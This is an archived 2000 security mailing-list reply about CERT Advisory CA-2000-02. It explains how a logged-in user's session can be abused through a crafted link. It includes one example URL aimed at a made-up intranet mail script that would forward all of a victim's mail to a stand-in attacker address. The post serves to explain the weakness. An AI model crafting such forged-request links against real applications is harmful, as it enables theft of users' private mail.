|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Fwd: CERT Advisory CA-2000-02
From: Cassius (sekurity
HOTMAIL.COM)Date: Thu Feb 03 2000 - 16:11:36 CST
- Next message: Iain Wade: ""The Finger Server""
- Previous message: Ussr Labs: "Local / Remote D.o.S Attack in Serv-U FTP-Server v2.5b for Win9x/WinNT Vulnerability"
- Maybe reply: Cassius: "Re: Fwd: CERT Advisory CA-2000-02"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Shockro,
The danger is also in variables. Pretend that I get you to click on this
link from within your custom intranet mail app.
example.com">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguyexample.com
It would forward all of your mail to badguyexample.com. This would work
because you already have a session with mailbox.asp.
Of course mailbox.asp is fake but you get the idea.
-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
- Next message: Iain Wade: ""The Finger Server""
- Previous message: Ussr Labs: "Local / Remote D.o.S Attack in Serv-U FTP-Server v2.5b for Win9x/WinNT Vulnerability"
- Maybe reply: Cassius: "Re: Fwd: CERT Advisory CA-2000-02"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]